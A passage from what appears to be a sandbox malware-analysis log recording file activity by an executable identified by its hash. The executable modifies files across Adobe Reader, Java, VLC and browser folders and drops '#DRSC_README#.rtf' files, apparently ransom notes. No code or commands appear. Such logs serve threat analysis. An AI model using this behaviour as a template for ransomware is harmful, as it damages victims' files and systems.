DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\circle_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\base_uris.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_field_grabber.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\blacklisted.certs 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunjce_provider.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\US_export_policy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateCCFiles_280x192.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\uk.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tr_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\updater.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoCanary.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ConvertFromInitialize.vsdx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fa.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxUnselected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_signed_out.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\caution.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\home-view.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\notification_helper.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\download.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\orbd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\organize.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for 